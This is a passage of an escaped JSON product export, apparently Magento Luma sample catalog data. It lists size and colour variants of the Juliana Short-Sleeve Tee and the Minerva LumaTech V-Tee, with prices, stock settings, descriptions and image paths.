ck\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1424\":{\"sku\":\"WS07-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-L-White\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1425\":{\"sku\":\"WS07-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-L-Yellow\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1426\":{\"sku\":\"WS07-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-XL-Black\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1427\":{\"sku\":\"WS07-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-XL-White\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1428\":{\"sku\":\"WS07-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-XL-Yellow\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1429\":{\"sku\":\"WS07\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cocona&reg; performance fabric|Polyester,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=Yes,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS07-XS-Black,size=XS,color=Black|sku=WS07-XS-White,size=XS,color=White|sku=WS07-XS-Yellow,size=XS,color=Yellow|sku=WS07-S-Black,size=S,color=Black|sku=WS07-S-White,size=S,color=White|sku=WS07-S-Yellow,size=S,color=Yellow|sku=WS07-M-Black,size=M,color=Black|sku=WS07-M-White,size=M,color=White|sku=WS07-M-Yellow,size=M,color=Yellow|sku=WS07-L-Black,size=L,color=Black|sku=WS07-L-White,size=L,color=White|sku=WS07-L-Yellow,size=L,color=Yellow|sku=WS07-XL-Black,size=XL,color=Black|sku=WS07-XL-White,size=XL,color=White|sku=WS07-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cocona&reg; performance fabric|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"Yes\",\"new\":\"Yes\",\"sale\":\"No\"},\"1430\":{\"sku\":\"WS08-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-XS-Black\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1431\":{\"sku\":\"WS08-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-XS-Blue\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1432\":{\"sku\":\"WS08-XS-Red\",\"store_view_code\":null,\"attribu